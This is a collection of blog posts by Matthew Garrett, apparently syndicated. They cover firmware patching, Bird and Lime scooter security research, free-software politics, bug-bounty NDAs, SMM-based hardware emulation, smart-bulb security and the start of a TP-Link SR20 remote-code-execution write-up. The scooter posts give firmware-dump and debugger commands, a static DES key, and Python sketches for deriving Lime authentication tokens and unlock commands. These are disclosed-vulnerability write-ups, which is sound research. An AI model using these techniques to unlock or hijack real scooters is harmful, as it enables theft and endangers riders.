As mentioned previously, the existing firmware code responded to writes to this register by saving it to its RAM. My plan was to stick my new code in unused space at the end of the firmware, including code that duplicated the firmware’s existing functionality. I could then replace the existing code that stored the register value with code that branched to my code, did whatever I wanted and then branched back to the original code. I hacked together some assembly that did the right thing in the most brute force way possible, but while Ghidra was happy with most of the code it wasn’t happy with the instruction that branched from the original code to the new code, or the instruction at the end that returned to the original code. The branch instruction differs from a jump instruction in that it gives a relative offset rather than an absolute address, which means that branching to nearby code can be encoded in fewer bytes than going further. I was specifying the longest jump encoding possible in my assembly (that’s what the :l means), but the linker was rewriting that to a shorter one. Ghidra was interpreting the shorter branch as a negative offset, and it wasn’t clear to me whether this was a binutils bug or a Ghidra bug. I ended up just hacking that code out of binutils so it generated code that Ghidra was happy with and got on with life.

Writing values directly to that EC register showed that it worked, which meant I could add an ACPI device that exposed the functionality to the OS. My goal here is to produce a standard Coreboot radio control device that other Coreboot platforms can implement, and then just write a single driver that exposes it. I wrote one for Linux that seems to work.

In summary: closed-source code is more annoying to improve, but that doesn’t mean it’s impossible. Also, strange Russians on forums make everything easier.


Letting Birds scooters fly free

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53258.html

(Note: These issues were disclosed to Bird, and they tell me that fixes have rolled out. I haven’t independently verified this.)

Bird produce a range of rental scooters that are available in multiple markets. With the exception of the Bird Zero[1], all their scooters share a common control board described in FCC filings. The board contains three primary components – a Nordic NRF52 Bluetooth controller, an STM32 SoC and a Quectel EC21-V modem. The Bluetooth and modem are both attached to the STM32 over serial and have no direct control over the rest of the scooter. The STM32 is tied to the scooter’s engine control unit and lights, and also receives input from the throttle (and, on some scooters, the brakes).

The pads labeled TP7-TP11 near the underside of the STM32 and the pads labeled TP1-TP5 near the underside of the NRF52 provide Serial Wire Debug, although confusingly the data and clock pins are the opposite way around between the STM and the NRF. Hooking this up via an STLink and using OpenOCD allows dumping of the firmware from both chips, which is where the fun begins. Running strings over the firmware from the STM32 revealed “Set mode to Free Drive Mode”. Challenge accepted.
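The dump itself is straightforward once SWD is hooked up – something along these lines, although the exact target config and flash size depend on the STM32 variant on the board:

```
openocd -f interface/stlink.cfg -f target/stm32f1x.cfg \
        -c "init; halt; dump_image stm32-firmware.bin 0x08000000 0x40000; shutdown"
```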

Working back from the code that printed that, it was clear that commands could be delivered to the STM from the Bluetooth controller. The Nordic NRF52 parts are an interesting design – like the STM, they have an ARM Cortex-M microcontroller core. Their firmware is split into two halves, one the low level Bluetooth code and the other application code. They provide an SDK for writing the application code, and working through Ghidra made it clear that the majority of the application firmware on this chip was just SDK code. That made it easier to find the actual functionality, which was just listening for writes to a specific BLE attribute and then hitting a switch statement depending on what was sent. Most of these commands just got passed over the wire to the STM, so it seemed simple enough to just send the “Free drive mode” command to the Bluetooth controller, have it pass that on to the STM and win. Obviously, though, things weren’t so easy.

It turned out that passing most of the interesting commands on to the STM was conditional on a variable being set, and the code path that hit that variable had some impressively complicated looking code. Fortunately, I got lucky – the code referenced a bunch of data, and searching for some of the values in that data revealed that they were the AES S-box values. Enabling the full set of commands required you to send an encrypted command to the scooter, which would then decrypt it and verify that the cleartext contained a specific value. Implementing this would be straightforward as long as I knew the key.

Most AES keys are 128 bits, or 16 bytes. Digging through the code revealed 8 bytes worth of key fairly quickly, but the other 8 bytes were less obvious. I finally figured out that 4 more bytes were the value of another Bluetooth variable which could be simply read out by a client. The final 4 bytes were more confusing, because all the evidence made no sense. It looked like it came from passing the scooter serial number to atoi(), which converts an ASCII representation of a number to an integer. But this seemed wrong, because atoi() stops at the first non-numeric value and the scooter serial numbers all started with a letter[2]. It turned out that I was overthinking it and for the vast majority of scooters in the fleet, this section of the key was always “0”.
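The interesting bit is the atoi() behaviour, which is easy to demonstrate. A sketch of the key assembly with hypothetical values throughout (the real offsets and contents aren’t reproduced here):

```python
# Sketch of how the 128-bit key appears to be assembled. The values and
# layout are placeholders; the point is the atoi() quirk -- C's atoi()
# stops at the first non-numeric character, so a serial number starting
# with a letter parses to 0.
def atoi(s: str) -> int:
    """Mimic C's atoi(): parse leading digits, return 0 if there are none."""
    digits = ""
    for ch in s:
        if ch.isdigit():
            digits += ch
        else:
            break
    return int(digits) if digits else 0

hardcoded = bytes(8)    # 8 bytes found in the firmware (placeholder)
ble_part = bytes(4)     # 4 bytes readable from a BLE attribute (placeholder)
serial_part = str(atoi("ABC1234")).encode()  # "0" for lettered serials

key = hardcoded + ble_part + serial_part.ljust(4, b"\x00")
assert atoi("ABC1234") == 0  # letter first, so atoi() gives 0
assert len(key) == 16        # 128-bit AES key
```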

At that point I had everything I needed to write a simple app to unlock the scooters, and it worked! For about 2 minutes, at which point the network would notice that the scooter was unlocked when it should be locked and send a lock command to force disable the scooter again. Ah well.

So, what else could I do? The next thing I tried was just modifying some STM firmware and flashing it onto a board. It still booted, indicating that there was no sort of verified boot process. Remember what I mentioned about the throttle being hooked through the STM32’s analogue-to-digital converters[3]? A bit of hacking later and I had a board that would appear to work normally, but about a minute after starting the ride would cut the throttle. Alternative options are left as an exercise for the reader.

Finally, there was the component I hadn’t really looked at yet. The Quectel modem actually contains its own application processor that runs Linux, making it significantly more powerful than any of the chips actually running the scooter application[4]. The STM communicates with the modem over serial, sending it an AT command asking it to make an SSL connection to a remote endpoint. It then uses further AT commands to send data over this SSL connection, allowing it to talk to the internet without having any sort of IP stack. Figuring out just what was going over this connection was made slightly difficult by virtue of all the debug functionality having been ripped out of the STM’s firmware, so in the end I took a more brute force approach – I identified the address of the function that sends data to the modem, hooked up OpenOCD to the SWD pins on the STM, ran OpenOCD’s gdb stub, attached gdb, set a breakpoint for that function and then dumped the arguments being passed to that function. A couple of minutes later and I had a full transaction between the scooter and the remote.
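The gdb side of that looks roughly like this, with 0x08001234 standing in for the real address of the send-to-modem function (on Cortex-M the first argument lives in r0, per the AAPCS):

```
(gdb) target extended-remote :3333
(gdb) break *0x08001234
(gdb) commands
> silent
> x/s $r0        # the buffer being handed to the modem
> continue
> end
(gdb) continue
```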

The scooter authenticates against the remote endpoint by sending its serial number and IMEI. You need to send both, but the IMEI didn’t seem to need to be associated with the serial number at all. New connections seemed to take precedence over existing connections, so it would be simple to just pretend to be every scooter and hijack all the connections, resulting in scooter unlock commands being sent to you rather than to the scooter or allowing someone to send fake GPS data and make it impossible for users to find scooters.

In summary: secrets that are stored on hardware that attackers can run arbitrary code on probably aren’t secret; not having verified boot on safety-critical components isn’t ideal; and devices should have meaningful cryptographic identity when authenticating against a remote endpoint.

Bird responded quickly to my reports, accepted my 90 day disclosure period and didn’t threaten to sue me at any point in the process, so good work Bird.

(Hey scooter companies I will absolutely accept gifts of interesting hardware in return for a cursory security audit)

[1] And some very early M365 scooters
[2] The M365 scooters that Bird originally deployed did have numeric serial numbers, but they were 6 characters of type code followed by a / followed by the actual serial number – the number of type codes was very constrained and atoi() would terminate at the / so this was still not a large keyspace
[3] Interestingly, Lime made a different design choice here and plumb the controls directly through to the engine control unit without the application processor having any involvement
[4] Lime run their entire software stack on the modem’s application processor, but because of [3] they don’t have any realtime requirements so this is more straightforward


Investigating the security of Lime scooters

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53024.html

(Note: to be clear, this vulnerability does not exist in the current version of the software on these scooters. Also, this is not the topic of my Kawaiicon talk.)

I’ve been looking at the security of the Lime escooters. These caught my attention because:
(1) There’s a whole bunch of them outside my building, and
(2) I can see them via Bluetooth from my sofa
which, given that I’m extremely lazy, made them more attractive targets than something that would actually require me to leave my home. I did some digging. Limes run Linux and have a single running app that’s responsible for scooter management. They have an internal debug port that exposes USB and which, until this happened, ran adb (as root!) over that port. As a result, there’s a fair amount of information available in various places, which made it easier to start figuring out how they work.

The obvious attack surface is Bluetooth (Limes have wifi, but only appear to use it to upload lists of nearby wifi networks, presumably for geolocation if they can’t get a GPS fix). Each Lime broadcasts its name as Lime-12345678 where 12345678 is 8 digits of hex. They implement Bluetooth Low Energy and expose a custom service with various attributes. One of these attributes (0x35 on at least some of them) sends Bluetooth traffic to the application processor, which then parses it. This is where things get a little more interesting. The app has a core event loop that can take commands from multiple sources and then makes a decision about which component to dispatch them to. Each command is of the following form:

AT+type,password,time,sequence,data$

where type is one of either ATH, QRY, CMD or DBG. The password is a TOTP derived from the IMEI of the scooter, the time is simply the current date and time of day, the sequence is a monotonically increasing counter and the data is a blob of JSON. The command is terminated with a $ sign. The code is fairly agnostic about where the command came from, which means that you can send the same commands over Bluetooth as you can over the cellular network that the Limes are connected to. Since locking and unlocking is triggered by one of these commands being sent over the network, it ought to be possible to do the same by pushing a command over Bluetooth.
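Framing one of these commands is trivial. A Python sketch, with a placeholder password (the TOTP parameters aren’t reproduced here) and a made-up JSON payload:

```python
# Sketch of the Lime command framing described above. The password and
# payload are placeholders; the real password is a TOTP derived from
# the scooter's IMEI.
import json

def build_command(ctype: str, password: str, when: str, seq: int, data: dict) -> str:
    assert ctype in ("ATH", "QRY", "CMD", "DBG")
    return f"AT+{ctype},{password},{when},{seq},{json.dumps(data)}$"

cmd = build_command("CMD", "123456", "2019-10-21 12:00:00", 42, {"op": "unlock"})
print(cmd)  # AT+CMD,123456,2019-10-21 12:00:00,42,{"op": "unlock"}$
```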

Unfortunately for nefarious individuals, all commands sent over Bluetooth are ignored until an authentication step is performed. The code I looked at had two ways of performing authentication – you could send an authentication token that was derived from the scooter’s IMEI and the current time and some other stuff, or you could send a token that was just an HMAC of the IMEI and a static secret. Doing the latter was more appealing, both because it’s simpler and because doing so flipped the scooter into manufacturing mode at which point all other command validation was also disabled (bye bye having to generate a TOTP). But how do we get the IMEI? There’s actually two approaches:

1) Read it off the sticker that’s on the side of the scooter (obvious, uninteresting)
2) Take advantage of how the scooter’s Bluetooth name is generated

Remember the 8 digits of hex I mentioned earlier? They’re generated by taking the IMEI, encrypting it using DES and a static key (0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88), discarding the first 4 bytes of the output and turning the last 4 bytes into 8 digits of hex. Since we’re discarding information, there’s no way to immediately reverse the process – but IMEIs for a given manufacturer are all allocated from the same range, so we can just take the entire possible IMEI space for the modem chipset Lime use, encrypt all of them and end up with a mapping of name to IMEI (it turns out this doesn’t guarantee that the mapping is unique – for around 0.01%, the same name maps to two different IMEIs). So we now have enough information to generate an authentication token that we can send over Bluetooth, which disables all further authentication and enables us to send further commands to disconnect the scooter from the network (so we can’t be tracked) and then unlock and enable the scooter.
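Putting the two halves together – with a keyed hash standing in for DES and placeholder secrets, since this is a sketch of the approach rather than the real firmware values:

```python
# Sketch of (1) inverting the BLE-name derivation by exhaustive forward
# mapping and (2) building the static-secret authentication token. Two
# stand-ins keep this self-contained: a keyed hash replaces DES under
# the fixed key quoted above, and the HMAC secret/digest are
# placeholders for whatever the firmware actually uses.
import hashlib
import hmac

STATIC_KEY = bytes([0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88])
STATIC_SECRET = b"firmware-baked-secret"  # hypothetical

def derive_name(imei: str) -> str:
    # Real devices DES-encrypt the IMEI with STATIC_KEY and keep the
    # last 4 bytes; a keyed hash stands in for DES in this sketch.
    digest = hashlib.sha256(STATIC_KEY + imei.encode()).digest()
    return "Lime-" + digest[-4:].hex().upper()

def auth_token(imei: str) -> str:
    # HMAC of the IMEI under a secret baked into the firmware.
    return hmac.new(STATIC_SECRET, imei.encode(), hashlib.sha256).hexdigest()

# Forward-map a (tiny, illustrative) slice of the IMEI space, then
# invert. As noted above, collisions are possible, so each name maps
# to a list of candidate IMEIs.
candidates = [f"8612345678{n:05d}" for n in range(1000)]
name_to_imei = {}
for imei in candidates:
    name_to_imei.setdefault(derive_name(imei), []).append(imei)

recovered = name_to_imei[derive_name(candidates[123])]
token = auth_token(recovered[0])  # token to send over Bluetooth
```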

(Note: these are actual crimes)

This all seemed very exciting, but then a shock twist occurred – earlier this year, Lime updated their authentication method. There’s now actual asymmetric cryptography involved, you’d need to engage in rather more actual crimes to obtain the key material necessary to authenticate over Bluetooth, and all of this research becomes much less interesting other than as an example of how other companies probably shouldn’t do it.

In any case, congratulations to Lime on actually implementing security!


Do we need to rethink what free software is?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52907.html

Licensing has always been a fundamental tool in achieving free software’s goals, with copyleft licenses deliberately taking advantage of copyright to ensure that all further recipients of software are in a position to exercise free software’s four essential freedoms. Recently we’ve seen people raising two very different concerns around existing licenses and proposing new types of license as remedies, and while both are (at present) incompatible with our existing concepts of what free software is, they both raise genuine issues that the community should seriously consider.

The first is the rise in licenses that attempt to restrict business models based around providing software as a service. If users can pay Amazon to provide a hosted version of a piece of software, there’s little incentive for them to pay the authors of that software. This has led to various projects adopting license terms such as the Commons Clause that effectively make it nonviable to provide such a service, forcing providers to pay for a commercial use license instead.

In general the entities pushing for these licenses are VC backed companies[1] who are themselves benefiting from free software written by volunteers that they give nothing back to, so I have very little sympathy. But it does raise a larger issue – how do we ensure that production of free software isn’t just a mechanism for the transformation of unpaid labour into corporate profit? I’m fortunate enough to be paid to write free software, but many projects of immense infrastructural importance are simultaneously fundamental to multiple business models and also chronically underfunded. In an era where people are becoming increasingly vocal about wealth and power disparity, this obvious unfairness will result in people attempting to find mechanisms to impose some degree of balance – and given the degree to which copyleft licenses prevented certain abuses of the commons, it’s likely that people will attempt to do so using licenses.

At the same time, people are spending more time considering some of the other ethical outcomes of free software. Copyleft ensures that you can share your code with your neighbour without your neighbour being able to deny the same freedom to others, but it does nothing to prevent your neighbour using your code to deny other fundamental, non-software, freedoms. As governments make more and more use of technology to perform acts of mass surveillance, detention, and even genocide, software authors may feel legitimately appalled at the idea that they are helping enable this by allowing their software to be used for any purpose. The JSON license includes a requirement that “The Software shall be used for Good, not Evil”, but the lack of any meaningful clarity around what “Good” and “Evil” actually mean makes it hard to determine whether it achieved its aims.

The definition of free software includes the assertion that it must be possible to use the software for any purpose. But if it is possible to use software in such a way that others lose their freedom to exercise those rights, is this really the standard we should be holding? Again, it’s unsurprising that people will attempt to solve this problem through licensing, even if in doing so they no longer meet the current definition of free software.

I don’t have solutions for these problems, and I don’t know for sure that it’s possible to solve them without causing more harm than good in the process. But in the absence of these issues being discussed within the free software community, we risk free software being splintered – on one side, with companies imposing increasingly draconian licensing terms in an attempt to prop up their business models, and on the other side, with people deciding that protecting people’s freedom to life, liberty and the pursuit of happiness is more important than protecting their freedom to use software to deny those freedoms to others.

As stewards of the free software definition, the Free Software Foundation should be taking the lead in ensuring that these issues are discussed. The priority of the board right now should be to restructure itself to ensure that it can legitimately claim to represent the community and play the leadership role it’s been failing to in recent years, otherwise the opportunity will be lost and much of the activist energy that underpins free software will be spent elsewhere.

If free software is going to maintain relevance, it needs to continue to explain how it interacts with contemporary social issues. If any organisation is going to claim to lead the community, it needs to be doing that.

[1] Plus one VC firm itself – Bain Capital, an investment firm notorious for investing in companies, extracting as much value as possible and then allowing the companies to go bankrupt


It’s time to talk about post-RMS Free Software

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52587.html

Richard Stallman has once again managed to demonstrate incredible insensitivity[1]. There’s an argument that in a pure technical universe this is irrelevant and we should instead only consider what he does in free software[2], but free software isn’t a purely technical topic – the GNU Manifesto is nakedly political, and while free software may result in better technical outcomes it is fundamentally focused on individual freedom and will compromise on technical excellence if otherwise the result would be any compromise on those freedoms. And in a political movement, there is no way that we can ignore the behaviour and beliefs of that movement’s leader. Stallman is driving away our natural allies. It’s inappropriate for him to continue as the figurehead for free software.

But I’m not calling for Stallman to be replaced. If the history of social movements has taught us anything, it’s that tying a movement to a single individual is a recipe for disaster. The FSF needs a president, but there’s no need for that person to be a leader – instead, we need to foster an environment where any member of the community can feel empowered to speak up about the importance of free software. A decentralised movement about returning freedoms to individuals can’t also be about elevating a single individual to near-magical status. Heroes will always end up letting us down. We fix that by removing the need for heroes in the first place, not attempting to find increasingly perfect heroes.

Stallman was never going to save us. We need to take responsibility for saving ourselves. Let’s talk about how we do that.

[1] There will doubtless be people who will leap to his defense with the assertion that he’s neurodivergent and all of these cases are consequences of that.

(A) I am unaware of a formal diagnosis of that, and I am unqualified to make one myself. I suspect that basically everyone making that argument is similarly unqualified.
(B) I’ve spent a lot of time working with him to help him understand why various positions he holds are harmful. I’ve reached the conclusion that it’s not that he’s unable to understand, he’s just unwilling to change his mind.

[2] This argument is, obviously, bullshit


Bug bounties and NDAs are an option, not the standard

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52432.html

Zoom had a vulnerability that allowed users on MacOS to be connected to a video conference with their webcam active simply by visiting an appropriately crafted page. Zoom’s response has largely been to argue that:

a) There’s a setting you can toggle to disable the webcam being on by default, so this isn’t a big deal,
b) When Safari added a security feature requiring that users explicitly agree to launch Zoom, this created a poor user experience and so they were justified in working around this (and so introducing the vulnerability), and,
c) The submitter asked whether Zoom would pay them for disclosing the bug, and when Zoom said they’d only do so if the submitter signed an NDA, they declined.

(a) and (b) are clearly ludicrous arguments, but (c) is the interesting one. Zoom go on to mention that they disagreed with the severity of the issue, and in the end decided not to change how their software worked. If the submitter had agreed to the terms of the NDA, then Zoom’s decision that this was a low severity issue would have led to them being given a small amount of money and never being allowed to talk about the vulnerability. Since Zoom apparently have no intention of fixing it, we’d presumably never have heard about it. Users would have been less informed, and the world would have been a less secure place.

The point of bug bounties is to provide people with an additional incentive to disclose security issues to companies. But what incentive are they offering? Well, that depends on who you are. For many people, the amount of money offered by bug bounty programs is meaningful, and agreeing to sign an NDA is worth it. For others, the ability to publicly talk about the issue is worth more than whatever the bounty may award – being able to give a presentation on the vulnerability at a high profile conference may be enough to get you a significantly better paying job. Others may be unwilling to sign an NDA on principle, refusing to trust that the company will ever disclose the issue or fix the vulnerability. And finally there are people who can’t sign such an NDA – they may have discovered the issue on work time, and employer policies may prohibit them doing so.

Zoom are correct that it’s not unusual for bug bounty programs to require NDAs. But when they talk about this being an industry standard, they come awfully close to suggesting that the submitter did something unusual or unreasonable in rejecting their bounty terms. When someone lets you know about a vulnerability, they’re giving you an opportunity to have the issue fixed before the public knows about it. They’ve done something they didn’t need to do – they could have just publicly disclosed it immediately, causing significant damage to your reputation and potentially putting your customers at risk. They could potentially have sold the information to a third party. But they didn’t – they came to you first. If you want to offer them money in order to encourage them (and others) to do the same in future, then that’s great. If you want to tie strings to that money, that’s a choice you can make – but there’s no reason for them to agree to those strings, and if they choose not to then you don’t get to complain about that afterwards. And if they make it clear at the time of submission that they intend to publicly disclose the issue after 90 days, then they’re acting in accordance with widely accepted norms. If you’re not able to fix an issue within 90 days, that’s very much your problem.

If your bug bounty requires people sign an NDA, you should think about why. If it’s so you can control disclosure and delay things beyond 90 days (and potentially never disclose at all), look at whether the amount of money you’re offering for that is anywhere near commensurate with the value the submitter could otherwise gain from the information and compare that to the reputational damage you’ll take from people deciding that it’s not worth it and just disclosing unilaterally. And, seriously, never ask for an NDA before you’re committing to a specific $ amount – it’s never reasonable to ask that someone sign away their rights without knowing exactly what they’re getting in return.

tl;dr – a bug bounty should only be one component of your vulnerability reporting process. You need to be prepared for people to decline any restrictions you wish to place on them, and you need to be prepared for them to disclose on the date they initially proposed. If they give you 90 days, that’s entirely within industry norms. Remember that a bargain is being struck here – you offering money isn’t being generous, it’s you attempting to provide an incentive for people to help you improve your security. If you’re asking people to give up more than you’re offering in return, don’t be surprised if they say no.


Creating hardware where no hardware exists

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52149.html

The laptop industry was still in its infancy back in 1990, but it already faced a core problem that we still do today – power and thermal management are hard, but also critical to a good user experience (and potentially to the lifespan of the hardware). These were the days when DOS and Windows had no memory protection, so handling these problems at the OS level would have been an invitation for someone to overwrite your management code and potentially kill your laptop. The safe option was pushing all of this out to an external management controller of some sort, but vendors in the 90s were the same as vendors now and would do basically anything to avoid having to drop an extra chip on the board. Thankfully(?), Intel had a solution.

The 386SL was released in October 1990 as a low-powered, mobile-optimised version of the 386. Critically, it included a feature that let vendors ensure that their power management code could run without OS interference. A small window of RAM was hidden behind the VGA memory[1], and the CPU was configured so that various events would cause it to stop executing the OS and jump to this protected region. It could then do whatever power or thermal management tasks were necessary and return control to the OS, which would be none the wiser. Intel called this System Management Mode, and we’ve never really recovered.

Step forward to the late 90s. USB is now a thing, but even the operating systems that support USB usually don’t in their installers (and plenty of operating systems still didn’t have USB drivers). The industry needed a transition path, and System Management Mode was there for them. By configuring the chipset to generate a System Management Interrupt (or SMI) whenever the OS tried to access the PS/2 keyboard controller, the CPU could then trap into some SMM code that knew how to talk to USB, figure out what was going on with the USB keyboard, fake up the results and pass them back to the OS. As far as the OS was concerned, it was talking to a normal keyboard controller – but in reality, the “hardware” it was talking to was entirely implemented in software on the CPU.

Since then we’ve seen even more stuff get crammed into SMM, which is annoying because in general it’s much harder for an OS to do interesting things with hardware if the CPU occasionally stops in order to run invisible code to touch hardware resources you were planning on using, and that’s even ignoring the fact that operating systems in general don’t really appreciate the entire world stopping and then restarting some time later without any notification. So, overall, SMM is a pain for OS vendors.

Change of topic. When Apple moved to x86 CPUs in the mid 2000s, they faced a problem. Their hardware was basically now just a PC, and that meant people were going to try to run their OS on random PC hardware. For various reasons this was unappealing, and so Apple took advantage of the one significant difference between their platforms and generic PCs. x86 Macs have a component called the System Management Controller that (ironically) seems to do a bunch of the stuff that the 386SL was designed to do on the CPU. It runs the fans, it reports hardware information, it controls the keyboard backlight, it does all kinds of things. So Apple embedded a string in the SMC, and the OS tries to read it on boot. If it fails, so does boot[2]. Qemu has a driver that emulates enough of the SMC that you can provide that string on the command line and boot OS X in qemu, something that’s documented further here.

What does this have to do with SMM? It turns out that you can configure x86 chipsets to trap into SMM on arbitrary IO port ranges, and older Macs had SMCs in IO port space[3]. After some fighting with Intel documentation[4] I had Coreboot’s SMI handler responding to writes to an arbitrary IO port range. With some more fighting I was able to fake up responses to reads as well. And then I took qemu’s SMC emulation driver and merged it into Coreboot’s SMM code. Now, accesses to the IO port range that the SMC occupies on real hardware generate SMIs, trap into SMM on the CPU, run the emulation code, handle writes, fake up responses to reads and return control to the OS. From the OS’s perspective, this is entirely invisible[5]. We’ve created hardware where none existed.
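The trap-and-emulate flow can be sketched outside of firmware. What follows is purely a toy Python model of the idea – none of these names exist in Coreboot, and the real SMI handler is C running in SMRAM – but it shows the shape: accesses that fall inside a claimed IO port range are diverted to an emulator, and everything else goes to (or misses) real hardware.

```python
# Toy model of SMM-style trap-and-emulate. Not Coreboot code: all names here
# (SMC_PORT_BASE, SmcEmulator, cpu_io_read) are invented for illustration.

SMC_PORT_BASE = 0x300          # hypothetical IO port range claimed for the fake SMC
SMC_PORT_LEN = 2

class SmcEmulator:
    """Stands in for the SMI handler: services IO accesses that the OS
    believes are hitting real hardware."""
    def __init__(self, key):
        self.key = key
        self.cursor = 0

    def io_read(self, port):
        # Fake up a response byte, as the SMM handler does for real reads
        byte = self.key[self.cursor % len(self.key)]
        self.cursor += 1
        return ord(byte)

def cpu_io_read(port, emulator):
    """Models the chipset: accesses inside the trapped range generate an
    'SMI' and are handled invisibly; everything else is a real IO access."""
    if SMC_PORT_BASE <= port < SMC_PORT_BASE + SMC_PORT_LEN:
        return emulator.io_read(port)   # trap into 'SMM', emulate, return
    raise IOError("no device at port %#x" % port)

emu = SmcEmulator("KEY")
print("".join(chr(cpu_io_read(SMC_PORT_BASE, emu)) for _ in range(3)))  # prints KEY
```

From the "OS" side of this model, reads from the trapped range simply return data – there is no way to tell (timing aside) that the values came from software rather than a device.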

The tree where I’m working on this is here, and I’ll see if it’s possible to clean this up in a reasonable way to get it merged into mainline Coreboot. Note that this only handles the SMC – actually booting OS X involves a lot more, but that’s something for another time.

[1] If the OS attempts to access this range, the chipset directs it to the video card instead of to actual RAM.
[2] It’s actually more complicated than that – see here for more.
[3] IO port space is a weird x86 feature where there’s an entire separate IO bus that isn’t part of the memory map and which requires different instructions to access. It’s low performance but also extremely simple, so hardware that has no performance requirements is often implemented using it.
[4] Some current Intel hardware has two sets of registers defined for setting up which IO ports should trap into SMM. I can’t find anything that documents what the relationship between them is, but if you program the obvious ones nothing happens and if you program the ones that are hidden in the section about LPC decoding ranges things suddenly start working.
[5] Eh technically a sufficiently enthusiastic OS could notice that the time it took for the access to occur didn’t match what it should on real hardware, or could look at the CPU’s count of the number of SMIs that have occurred and correlate that with accesses, but good enough


Which smart bulbs should you buy (from a security perspective)

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/51910.html

People keep asking me which smart bulbs they should buy. It’s a great question! As someone who has, for some reason, ended up spending a bunch of time reverse engineering various types of lightbulb, I’m probably a reasonable person to ask. So. There are four primary communications mechanisms for bulbs: wifi, bluetooth, zigbee and zwave. There are basically zero compelling reasons to care about zwave, so I’m not going to.

Wifi

Advantages: Doesn’t need an additional hub – you can just put the bulbs wherever. The bulbs can connect out to a cloud service, so you can control them even if you’re not on the same network.
Disadvantages: Only works if you have wifi coverage, each bulb has to have wifi hardware and be configured appropriately.
Which should you get: If you search Amazon for “wifi bulb” you’ll get a whole bunch of cheap bulbs. Don’t buy any of them. They’re mostly based on a custom protocol from Zengge and they’re shit. Colour reproduction is bad, there’s no good way to use the colour LEDs and the white LEDs simultaneously, and if you use any of the vendor apps they’ll proxy your device control through a remote server with terrible authentication mechanisms. Just don’t. The ones that aren’t Zengge are generally based on the Tuya platform, whose security model is to have keys embedded in some incredibly obfuscated code and hope that nobody can find them. TP-Link make some reasonably competent bulbs but also use a weird custom protocol with hand-rolled security. Eufy are fine but again there’s weird custom security. Lifx are the best bulbs, but have zero security on the local network – anyone on your wifi can control the bulbs. If that’s something you care about then they’re a bad choice, but also if that’s something you care about maybe just don’t let people you don’t trust use your wifi.
Conclusion: If you have to use wifi, go with lifx. Their security is not meaningfully worse than anything else on the market (and they’re better than many), and they’re better bulbs. But you probably shouldn’t go with wifi.

Bluetooth

Advantages: Doesn’t need an additional hub. Doesn’t need wifi coverage. Doesn’t connect to the internet, so remote attack is unlikely.
Disadvantages: Only one control device at a time can connect to a bulb, so harder to share. Control device needs to be in Bluetooth range of the bulb. Doesn’t connect to the internet, so you can’t control your bulbs remotely.
Which should you get: Again, most Bluetooth bulbs you’ll find on Amazon are shit. There’s a whole bunch of weird custom protocols and the quality of the bulbs is just bad. If you’re going to go with anything, go with the C by GE bulbs. Their protocol is still some AES-encrypted custom binary thing, but they use a Bluetooth controller from Telink that supports a mesh network protocol. This means that you can talk to any bulb in your network and still send commands to other bulbs – the dual advantages here are that you can communicate with bulbs that are outside the range of your control device and also that you can have as many control devices as you have bulbs. If you’ve bought into the Google Home ecosystem, you can associate them directly with a Home and use Google Assistant to control them remotely. GE also sell a wifi bridge – I have one, but haven’t had time to review it yet, so I can’t make any assertions about its competence. The colour bulbs are also disappointing, with much dimmer colour output than white output.

Zigbee

Advantages: Zigbee is a mesh protocol, so bulbs can forward messages to each other. The bulbs are also pretty cheap. Zigbee is a standard, so you can obtain bulbs from several vendors that will then interoperate – unfortunately there are actually two separate standards for Zigbee bulbs, and you’ll sometimes find yourself with incompatibility issues there.
Disadvantages: Your phone doesn’t have a Zigbee radio, so you can’t communicate with the bulbs directly. You’ll need a hub of some sort to bridge between IP and Zigbee. The ecosystem is kind of a mess, and you may have weird incompatibilities.
Which should you get: Pretty much every vendor that produces Zigbee bulbs also produces a hub for them. Don’t get the Sengled hub – anyone on the local network can perform arbitrary unauthenticated command execution on it. I’ve previously recommended the Ikea Tradfri, which at the time only had local control. They’ve since added remote control support, and I haven’t investigated that in detail. But overall, I’d go with the Philips Hue. Their colour bulbs are simply the best on the market, and their security story seems solid – performing a factory reset on the hub generates a new keypair, and adding local control users requires a physical button press on the hub to allow pairing. Using the Philips hub doesn’t tie you into only using Philips bulbs, but right now the Philips bulbs tend to be as cheap (or cheaper) than anything else.

But what about

If you’re into tying together all kinds of home automation stuff, then either go with Smartthings or roll your own with Home Assistant. Both are definitely more effort if you only want lighting.

My priority is software freedom

Excellent! There are various bulbs that can run the Espurna or AiLight firmwares, but you’ll have to deal with flashing them yourself. You can tie that into Home Assistant and have a completely free stack. If you’re ok with your bulbs being proprietary, Home Assistant can speak to most types of bulb without an additional hub (you’ll need a supported Zigbee USB stick to control Zigbee bulbs), and will support the C by GE ones as soon as I figure out why my Bluetooth transmissions stop working every so often.

Conclusion

Outside niche cases, just buy a Hue. Philips have done a genuinely good job. Don’t buy cheap wifi bulbs. Don’t buy a Sengled hub.

(Disclaimer: I mentioned a Google product above. I am a Google employee, but do not work on anything related to Home.)


Remote code execution as root from the local network on TP-Link SR20 routers

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/51672.html

The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign – popen() passes its argument directly to the shell, so if there’s any way to get user controlled input into a popen() call you’re basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.
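The dispatch logic is simple enough to sketch. The header bytes and the command constant are from the description above; everything else here (the function name, the return strings) is mine, purely for illustration:

```python
# Sketch of the TDDP dispatch described above. Only the two header bytes the
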